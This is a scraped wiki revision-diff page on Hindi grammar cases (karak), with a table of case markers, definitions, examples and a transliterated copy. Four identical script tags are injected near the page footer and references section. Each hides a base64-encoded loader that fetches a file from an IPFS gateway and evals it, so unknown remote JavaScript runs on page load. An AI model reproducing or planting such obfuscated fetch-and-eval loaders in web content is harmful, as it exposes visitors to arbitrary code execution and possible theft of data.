Difference between revisions of "कारक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
[[संज्ञा]] या [[सर्वनाम]] के जिस रूप से वाक्य के अन्य शब्दों के साथ उसके सम्बन्ध का बोध होता है, उसे कारक कहते हैं। हिन्दी में आठ कारक होते हैं- कर्ता, कर्म, करण, सम्प्रदान, अपादान, सम्बन्ध, अधिकरण और सम्बोधन। विभक्ति या परसर्ग-जिन प्रत्ययों से कारकों की स्थितियों का बोध होता है, उन्हें विभक्ति या परसर्ग कहते हैं। आठ कारकों के विभक्ति चिह्न या परसर्ग इस प्रकार होते हैं-
 
[[संज्ञा]] या [[सर्वनाम]] के जिस रूप से वाक्य के अन्य शब्दों के साथ उसके सम्बन्ध का बोध होता है, उसे कारक कहते हैं। हिन्दी में आठ कारक होते हैं- कर्ता, कर्म, करण, सम्प्रदान, अपादान, सम्बन्ध, अधिकरण और सम्बोधन। विभक्ति या परसर्ग-जिन प्रत्ययों से कारकों की स्थितियों का बोध होता है, उन्हें विभक्ति या परसर्ग कहते हैं। आठ कारकों के विभक्ति चिह्न या परसर्ग इस प्रकार होते हैं-
 
+
{| class="bharattable-purple" border="1" align="right"
'''कारक''' – विभक्ति चिह्न या परसर्ग
+
|+कारक के विभिन्न चिह्न
#कर्ता ने
+
|-
#कर्म को
+
! कारक
#करण से, द्वारा
+
! चिह्न
#सम्प्रदान के लिए, को
+
! अर्थ
#अपादान से
+
|-
#सम्बन्ध का, की, के; ना, नी, ने; रा, री, रे
+
| कर्ता
#अधिकरण में, पर
+
| ने  
#सम्बोधन – हे! अरे! अजी!
+
| काम करने वाला
 
+
|-
 +
| कर्म
 +
| को
 +
| जिस पर काम का प्रभाव पड़े
 +
|-
 +
| करण
 +
| से, द्वारा
 +
| जिसके द्वारा कर्ता काम करें
 +
|-
 +
| सम्प्रदान
 +
| को,के लिए
 +
| जिसके लिए क्रिया की जाए
 +
|-
 +
| अपादान
 +
| से (अलग होना)
 +
| जिससे अलगाव हो
 +
|-
 +
| सम्बन्ध
 +
| का, की, के; ना, नी, ने; रा, री, रे
 +
| अन्य पदों से सम्बन्ध
 +
|-
 +
| अधिकरण
 +
| में,पर
 +
| क्रिया का आधार
 +
|-
 +
| संबोधन
 +
| हे! अरे! अजी!
 +
| किसी को पुकारना, बुलाना
 +
|}
 
==कर्ता कारक==
 
==कर्ता कारक==
 
क्रिया करने वाले को कर्ता कहते हैं। यह स्वतंत्र होता है। इसमें 'ने' विभक्ति का प्रयोग होता है। जैसे-
 
क्रिया करने वाले को कर्ता कहते हैं। यह स्वतंत्र होता है। इसमें 'ने' विभक्ति का प्रयोग होता है। जैसे-
Line 18: Line 46:
 
*राम रोटी खाता है।
 
*राम रोटी खाता है।
 
*मैं जाता हूँ।
 
*मैं जाता हूँ।
 
 
 
==कर्म कारक==
 
==कर्म कारक==
 
जिस पर [[क्रिया]] के व्यापार का प्रभाव पड़ता है। उसे कर्म कारक कहते हैं। इसमें 'को' विभक्ति चिह्न का प्रयोग होता है। जैसे-
 
जिस पर [[क्रिया]] के व्यापार का प्रभाव पड़ता है। उसे कर्म कारक कहते हैं। इसमें 'को' विभक्ति चिह्न का प्रयोग होता है। जैसे-
Line 26: Line 53:
 
*श्याम पुस्तक पढ़ता है।
 
*श्याम पुस्तक पढ़ता है।
 
*मेरे द्वारा यह कार्य हुआ है।
 
*मेरे द्वारा यह कार्य हुआ है।
 
 
 
==करण कारक==
 
==करण कारक==
 
जिसके द्वारा क्रिया होती है, उसे करण कारक कहते हैं। करण कारक के विभक्ति चिह्न 'से, द्वारा' हैं। जैसे-
 
जिसके द्वारा क्रिया होती है, उसे करण कारक कहते हैं। करण कारक के विभक्ति चिह्न 'से, द्वारा' हैं। जैसे-
 
*कलम से पत्र लिखा है।
 
*कलम से पत्र लिखा है।
 
*मेरे द्वारा कार्य हुआ है।
 
*मेरे द्वारा कार्य हुआ है।
 
 
 
==सम्प्रदान कारक==
 
==सम्प्रदान कारक==
 
जिसके लिए क्रिया की जाती है अथवा जिसे कोई वस्तु दी जाती है, वहाँ सम्प्रदान कारक होता है। इसके विभक्ति चिह्न 'के लिए' और 'को' हैं। जैसे-
 
जिसके लिए क्रिया की जाती है अथवा जिसे कोई वस्तु दी जाती है, वहाँ सम्प्रदान कारक होता है। इसके विभक्ति चिह्न 'के लिए' और 'को' हैं। जैसे-
Line 37: Line 62:
 
*राज ज्ञानू को पुस्तक देता है।
 
*राज ज्ञानू को पुस्तक देता है।
 
*मैं बाज़ार को जा रहा हूँ।
 
*मैं बाज़ार को जा रहा हूँ।
 
 
 
==अपादान कारक==
 
==अपादान कारक==
 
जहाँ एक संज्ञा का दूसरी संज्ञा से अलग होना सूचित होता है, वहाँ अपादान कारक होता है। इसका विभक्ति चिह्न 'से' है। जैसे-
 
जहाँ एक संज्ञा का दूसरी संज्ञा से अलग होना सूचित होता है, वहाँ अपादान कारक होता है। इसका विभक्ति चिह्न 'से' है। जैसे-
Line 43: Line 67:
 
*लड़का छत से गिरा है।
 
*लड़का छत से गिरा है।
 
*में बैंक से रुपया लाया हूँ।
 
*में बैंक से रुपया लाया हूँ।
 
 
 
==सम्बन्ध कारक==
 
==सम्बन्ध कारक==
 
जहाँ एक संज्ञा या सर्वनाम का सम्बन्ध दूसरी संज्ञा या सर्वनाम से सूचित होता है, वहाँ सम्बन्ध कारक होता है। इसके विभक्ति चिह्न का, की, के; रा, री, रे; ना, नी, ने हैं। जैसे-
 
जहाँ एक संज्ञा या सर्वनाम का सम्बन्ध दूसरी संज्ञा या सर्वनाम से सूचित होता है, वहाँ सम्बन्ध कारक होता है। इसके विभक्ति चिह्न का, की, के; रा, री, रे; ना, नी, ने हैं। जैसे-
Line 49: Line 72:
 
*मेरा लड़का, मेरी लड़की, हमारे बच्चे।
 
*मेरा लड़का, मेरी लड़की, हमारे बच्चे।
 
*अपना लड़का, अपना लड़की, अपने लड़के।
 
*अपना लड़का, अपना लड़की, अपने लड़के।
 
 
 
==अधिकरण कारक==
 
==अधिकरण कारक==
 
जहाँ कोई संज्ञा या सर्वनाम किसी अन्य संज्ञा या सर्वनाम का आधार हो, वहाँ अधिकरण कारक होता है। इसके विभक्ति चिह्न 'में, पर' हैं। जैसे-
 
जहाँ कोई संज्ञा या सर्वनाम किसी अन्य संज्ञा या सर्वनाम का आधार हो, वहाँ अधिकरण कारक होता है। इसके विभक्ति चिह्न 'में, पर' हैं। जैसे-
Line 55: Line 77:
 
*छप पर कपड़े सूख रहे हैं।  
 
*छप पर कपड़े सूख रहे हैं।  
 
*मुझमें शक्ति बहुत कम है।  
 
*मुझमें शक्ति बहुत कम है।  
 
 
 
==सम्बोधन कारक==
 
==सम्बोधन कारक==
 
जहाँ पुकारने, चेतावनी देने या ध्यान आकर्षित करने के लिए किसी को सम्बोधित किया जाता है, वहाँ सम्बोधन कारक होता है। इसके विभक्ति चिह्न 'हे, अरे, अजी' हैं। जैसे-
 
जहाँ पुकारने, चेतावनी देने या ध्यान आकर्षित करने के लिए किसी को सम्बोधित किया जाता है, वहाँ सम्बोधन कारक होता है। इसके विभक्ति चिह्न 'हे, अरे, अजी' हैं। जैसे-
Line 63: Line 84:
  
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 70: Line 92:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{व्याकरण}}
 +
[[Category:व्याकरण]]
 +
[[Category:हिन्दी भाषा]][[Category:भाषा कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 09:13, 14 October 2011

sanjna ya sarvanam ke jis roop se vaky ke any shabdoan ke sath usake sambandh ka bodh hota hai, use karak kahate haian. hindi mean ath karak hote haian- karta, karm, karan, sampradan, apadan, sambandh, adhikaran aur sambodhan. vibhakti ya parasarg-jin pratyayoan se karakoan ki sthitiyoan ka bodh hota hai, unhean vibhakti ya parasarg kahate haian. ath karakoan ke vibhakti chihn ya parasarg is prakar hote haian-

karak ke vibhinn chihn
karak chihn arth
karta ne kam karane vala
karm ko jis par kam ka prabhav p de
karan se, dvara jisake dvara karta kam karean
sampradan ko,ke lie jisake lie kriya ki jae
apadan se (alag hona) jisase alagav ho
sambandh ka, ki, ke; na, ni, ne; ra, ri, re any padoan se sambandh
adhikaran mean,par kriya ka adhar
sanbodhan he! are! aji! kisi ko pukarana, bulana

karta karak

kriya karane vale ko karta kahate haian. yah svatantr hota hai. isamean 'ne' vibhakti ka prayog hota hai. jaise-

  • rajendr ne patr bheja hai.
  • maianne bhojan kiya hai.

kahian-kahian vaky mean karta karak ke 'ne' chihn ka lop bhi rahata hai. jaise-

  • ram roti khata hai.
  • maian jata hooan.

karm karak

jis par kriya ke vyapar ka prabhav p data hai. use karm karak kahate haian. isamean 'ko' vibhakti chihn ka prayog hota hai. jaise-

  • gopal ne radha ko bulaya hai.
  • usane pani ko chhana hai.

kuchh vakyoan mean karm karak ke chihn 'ko' ka lop bhi rahata hai. jaise-

  • shyam pustak padhata hai.
  • mere dvara yah kary hua hai.

karan karak

jisake dvara kriya hoti hai, use karan karak kahate haian. karan karak ke vibhakti chihn 'se, dvara' haian. jaise-

  • kalam se patr likha hai.
  • mere dvara kary hua hai.

sampradan karak

jisake lie kriya ki jati hai athava jise koee vastu di jati hai, vahaan sampradan karak hota hai. isake vibhakti chihn 'ke lie' aur 'ko' haian. jaise-

  • bhookhe ke lie roti lao.
  • raj jnanoo ko pustak deta hai.
  • maian bazar ko ja raha hooan.

apadan karak

jahaan ek sanjna ka doosari sanjna se alag hona soochit hota hai, vahaan apadan karak hota hai. isaka vibhakti chihn 'se' hai. jaise-

  • pe d se patte gire.
  • l daka chhat se gira hai.
  • mean baiank se rupaya laya hooan.

sambandh karak

jahaan ek sanjna ya sarvanam ka sambandh doosari sanjna ya sarvanam se soochit hota hai, vahaan sambandh karak hota hai. isake vibhakti chihn ka, ki, ke; ra, ri, re; na, ni, ne haian. jaise-

  • ram ka l daka, shyam ki l daki, gita ke bachche.
  • mera l daka, meri l daki, hamare bachche.
  • apana l daka, apana l daki, apane l dake.

adhikaran karak

jahaan koee sanjna ya sarvanam kisi any sanjna ya sarvanam ka adhar ho, vahaan adhikaran karak hota hai. isake vibhakti chihn 'mean, par' haian. jaise-

  • mahal mean dipak jal raha hai.
  • chhap par kap de sookh rahe haian.
  • mujhamean shakti bahut kam hai.

sambodhan karak

jahaan pukarane, chetavani dene ya dhyan akarshit karane ke lie kisi ko sambodhit kiya jata hai, vahaan sambodhan karak hota hai. isake vibhakti chihn 'he, are, aji' haian. jaise-

  • he eeshvar! kripa karo.
  • are mohan! idhar ao.
  • aji! tum use kya maroge?


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>